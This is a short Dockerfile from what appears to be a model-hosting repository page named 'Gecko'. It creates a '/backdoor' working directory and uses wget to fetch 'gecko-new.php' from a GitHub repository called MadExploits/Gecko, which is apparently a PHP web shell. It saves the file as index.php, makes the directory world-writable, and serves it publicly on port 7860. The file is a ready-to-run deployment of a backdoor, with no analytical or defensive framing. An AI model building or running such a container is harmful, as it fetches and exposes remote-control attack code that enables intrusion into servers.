Gecko / Dockerfile
1tbfree's picture
Create Dockerfile
a48ce66 verified
raw
history blame contribute delete
265 Bytes
FROM php:latest
WORKDIR /backdoor
RUN apt update
RUN apt install wget -y
RUN wget https://github.com/MadExploits/Gecko/raw/refs/heads/main/gecko-new.php -O index.php
RUN echo php -S 0.0.0.0:7860 > file.sh
RUN chmod +777 $(pwd)
RUN chmod +777 file.sh
CMD "./file.sh"